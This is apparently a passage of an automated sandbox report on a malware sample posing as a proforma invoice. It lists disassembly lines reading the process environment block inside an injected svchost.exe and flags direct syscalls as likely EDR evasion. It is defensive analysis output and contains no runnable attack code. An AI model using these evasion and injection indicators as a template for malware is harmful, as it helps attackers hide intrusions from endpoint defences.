                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E59C mov eax, dword ptr fs:[00000030h]2_2_0336E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov eax, dword ptr fs:[00000030h]2_2_03332582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov ecx, dword ptr fs:[00000030h]2_2_03332582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364588 mov eax, dword ptr fs:[00000030h]2_2_03364588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033325E0 mov eax, dword ptr fs:[00000030h]2_2_033325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033365D0 mov eax, dword ptr fs:[00000030h]2_2_033365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A430 mov eax, dword ptr fs:[00000030h]2_2_0336A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C427 mov eax, dword ptr fs:[00000030h]2_2_0332C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC460 mov ecx, dword ptr fs:[00000030h]2_2_033BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA456 mov eax, dword ptr fs:[00000030h]2_2_033EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332645D mov eax, dword ptr fs:[00000030h]2_2_0332645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335245A mov eax, dword ptr fs:[00000030h]2_2_0335245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033644B0 mov ecx, dword ptr fs:[00000030h]2_2_033644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BA4B0 mov eax, dword ptr fs:[00000030h]2_2_033BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033364AB mov eax, dword ptr fs:[00000030h]2_2_033364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA49A mov eax, dword ptr fs:[00000030h]2_2_033EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033304E5 mov ecx, dword ptr fs:[00000030h]2_2_033304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332CB7E mov eax, dword ptr fs:[00000030h]2_2_0332CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEB50 mov eax, dword ptr fs:[00000030h]2_2_033DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]2_2_033E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]2_2_033E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]2_2_033C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]2_2_033C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FAB40 mov eax, dword ptr fs:[00000030h]2_2_033FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D8B42 mov eax, dword ptr fs:[00000030h]2_2_033D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]2_2_03340BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]2_2_03340BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]2_2_033E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]2_2_033E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EBFC mov eax, dword ptr fs:[00000030h]2_2_0335EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BCBF0 mov eax, dword ptr fs:[00000030h]2_2_033BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEBD0 mov eax, dword ptr fs:[00000030h]2_2_033DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]2_2_03354A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]2_2_03354A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA38 mov eax, dword ptr fs:[00000030h]2_2_0336CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA24 mov eax, dword ptr fs:[00000030h]2_2_0336CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EA2E mov eax, dword ptr fs:[00000030h]2_2_0335EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BCA11 mov eax, dword ptr fs:[00000030h]2_2_033BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]2_2_033ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]2_2_033ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEA60 mov eax, dword ptr fs:[00000030h]2_2_033DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]2_2_03340A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]2_2_03340A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]2_2_03338AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]2_2_03338AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386AA4 mov eax, dword ptr fs:[00000030h]2_2_03386AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368A90 mov edx, dword ptr fs:[00000030h]2_2_03368A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404A80 mov eax, dword ptr fs:[00000030h]2_2_03404A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]2_2_0336AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]2_2_0336AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330AD0 mov eax, dword ptr fs:[00000030h]2_2_03330AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]2_2_03364AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]2_2_03364AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B892A mov eax, dword ptr fs:[00000030h]2_2_033B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C892B mov eax, dword ptr fs:[00000030h]2_2_033C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC912 mov eax, dword ptr fs:[00000030h]2_2_033BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]2_2_03328918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]2_2_03328918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]2_2_033AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]2_2_033AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]2_2_033D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]2_2_033D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC97C mov eax, dword ptr fs:[00000030h]2_2_033BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]2_2_0337096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov edx, dword ptr fs:[00000030h]2_2_0337096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]2_2_0337096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0946 mov eax, dword ptr fs:[00000030h]2_2_033B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov esi, dword ptr fs:[00000030h]2_2_033B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]2_2_033B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]2_2_033B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]2_2_033309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]2_2_033309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]2_2_033629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]2_2_033629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE9E0 mov eax, dword ptr fs:[00000030h]2_2_033BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033649D0 mov eax, dword ptr fs:[00000030h]2_2_033649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA9D3 mov eax, dword ptr fs:[00000030h]2_2_033FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C69C0 mov eax, dword ptr fs:[00000030h]2_2_033C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov ecx, dword ptr fs:[00000030h]2_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A830 mov eax, dword ptr fs:[00000030h]2_2_0336A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]2_2_033D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]2_2_033D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC810 mov eax, dword ptr fs:[00000030h]2_2_033BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h]2_2_033BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h]2_2_033BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6870 mov eax, dword ptr fs:[00000030h]2_2_033C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6870 mov eax, dword ptr fs:[00000030h]2_2_033C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360854 mov eax, dword ptr fs:[00000030h]2_2_03360854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334859 mov eax, dword ptr fs:[00000030h]2_2_03334859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334859 mov eax, dword ptr fs:[00000030h]2_2_03334859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03342840 mov ecx, dword ptr fs:[00000030h]2_2_03342840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC89D mov eax, dword ptr fs:[00000030h]2_2_033BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330887 mov eax, dword ptr fs:[00000030h]2_2_03330887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C8F9 mov eax, dword ptr fs:[00000030h]2_2_0336C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C8F9 mov eax, dword ptr fs:[00000030h]2_2_0336C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA8E4 mov eax, dword ptr fs:[00000030h]2_2_033FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E8C0 mov eax, dword ptr fs:[00000030h]2_2_0335E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EF28 mov eax, dword ptr fs:[00000030h]2_2_0335EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332F12 mov eax, dword ptr fs:[00000030h]2_2_03332F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404F68 mov eax, dword ptr fs:[00000030h]2_2_03404F68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CF1F mov eax, dword ptr fs:[00000030h]2_2_0336CF1F
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002A80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_002A80A9
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0027A124 SetUnhandledExceptionFilter,0_2_0027A124
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0027A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0027A155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
